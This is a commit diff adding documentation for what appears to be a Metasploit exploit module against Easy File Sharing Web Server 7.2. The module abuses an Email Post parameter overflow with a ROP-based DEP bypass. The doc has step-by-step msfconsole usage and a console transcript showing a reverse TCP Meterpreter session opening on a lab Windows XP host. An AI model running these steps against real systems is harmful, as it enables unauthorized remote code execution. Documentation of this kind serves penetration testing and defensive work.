Added exploit documentation

Mzack9999 · Mzack9999 · commit c7a55ef92f80 · 2017-06-20T09:03:40.000+02:00
diff --git a/modules/exploits/windows/http/easyfilesharing_post.md b/modules/exploits/windows/http/easyfilesharing_post.md
@@ -0,0 +1,53 @@
+## Description
+
+This module exploits a vulnerability in the Easy File Sharing Web Server application, by exploiting an overflow in the Email Post parameter, through DEP bypass via ROP chain.
+
+This module allows a remote attacker to get a payload executed under the context of the user running the Easy File Sharing application
+
+## Vulnerable Application
+
+[Easy File Sharing](http://www.sharing-file.com/) is a file sharing software that allows visitors to upload/download files easily through a Web Browser (IE, Firefox, Chrome etc.).
+
+This module has been tested successfully on
+
+* Easy File Sharing 7.2 on Windows XP En Sp3
+
+Installers:
+
+[Easy File Sharing Installers](http://www.sharing-file.com/efssetup.exe)
+
+## Verification Steps
+
+1. Start `msfconsole`
+2. Do: `use exploits/windows/http/easyfilesharing_post`
+3. Do: `set rhosts [IP]`
+4. Do: `exploit`
+5. You should get your payload executed
+
+## Scenarios
+
+```
+root@kali:~$ msfconsole -q
+msf > use exploit/windows/http/easyfilesharing_post
+msf exploit(easyfilesharing_post) > set RHOST 192.168.56.101
+RHOST => 192.168.56.101
+msf exploit(easyfilesharing_post) > exploit
+ 
+[*] Started reverse TCP handler on 192.168.56.1:4444
+[*] Sending stage (957487 bytes) to 192.168.56.101
+[*] Meterpreter session 1 opened (192.168.56.1:4444 -> 192.168.56.101:1253) at 2017-06-17 22:45:34 +0200
+ 
+meterpreter > sysinfo
+Computer    	: MM
+OS          	: Windows XP (Build 2600, Service Pack 3).
+Architecture	: x86
+System Language : en_US
+Domain      	: WORKGROUP
+Logged On Users : 2
+Meterpreter 	: x86/windows
+meterpreter > exit
+[*] Shutting down Meterpreter...
+ 
+[*] 192.168.56.101 - Meterpreter session 1 closed.  Reason: User exit
+msf exploit(easyfilesharing_post) >
+```
